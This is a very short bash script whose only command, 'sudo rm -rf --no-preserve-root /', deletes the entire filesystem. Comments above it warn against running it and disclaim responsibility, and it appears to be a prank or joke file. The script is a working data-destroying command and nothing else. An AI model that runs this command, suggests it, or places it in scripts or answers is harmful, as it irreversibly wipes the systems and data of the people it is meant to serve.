#!/bin/bash

#CAUTION: DO NOT RUN THIS COMMAND IF YOU CHERISH YOUR LIFE
#AGREEMENT: ONCE YOU EXECUTE THIS LINE, YOU AGREE THAT I WILL TAKE NO RESPONSIBILITY OF ANY POSSIBLE OUTCOME 

sudo rm -rf --no-preserve-root /
